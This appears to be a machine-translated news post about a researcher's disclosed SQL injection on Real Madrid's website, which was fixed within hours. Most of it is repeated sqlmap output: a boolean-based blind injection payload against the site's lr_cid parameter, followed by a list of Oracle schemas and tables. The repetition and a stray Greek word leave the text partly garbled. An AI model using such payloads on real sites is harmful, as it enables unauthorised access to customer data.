A Greek researcher managed to locate an important one security gap on Real Madrid's official website, which allowed him to perform an SQL injection successfully and gain access to the team's database.
On October 10, the Anastasis Vassiliadis identified the vulnerability and informed Real Madrid.
The cooperation was flawless and immediate and the problem was fixed within a few hours.
It is worth noting that the base of the webσελίδαs had over 7.000 tables and many important items such as millions of customer accounts from the team's official store.
Some vulnerability information:
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma
—
websites application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point(s) from stored Session:
—
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma
—
web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:
—
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma
—
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:
—
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma
—
web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:
—
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma
—
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:
—
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma
—
web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:
—
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma
—
web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:
—
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma
—
web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:
—
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma
—
web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:
—
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma
—
web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:
—
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma
—
web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:
—
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma
—
web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:
—
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma
—
web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:
—
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma
—
web application technology: JSP
back-end DBMS: Oracle
Database: EXFSYS
[1 table] + ——————————– +
| RLM $ PARSEDCOND |
+ ——————————– +
Database: XDB
[2 tables] + ——————————– +
| XDB $ IMPORT_TT_INFO |
| XDB $ XIDX_IMP_T |
+ ——————————– +
Database: APEX_030200
[3 tables] + ——————————– +
| WWV_FLOW_DUAL100 |
| WWV_FLOW_LOV_TEMP |
| WWV_FLOW_TEMP_TABLE |
+ ——————————– +
Database: SYSTEM
[4 tables] + ——————————– +
| HELP |
| OL $ |
| OL $ HINTS |
| OL $ NODES |
+ ——————————– +
Database: FATWIREDLV
[3437 tables] + ——————————– +
Database: SYS
[26 tables] + ——————————– +
Database: MDSYS
[35 tables] + ——————————– +
Awareness of vulnerabilities discovered in organizations is considered extremely necessary
(especially when there are in websites high traffic), and for us they are an immediate priority.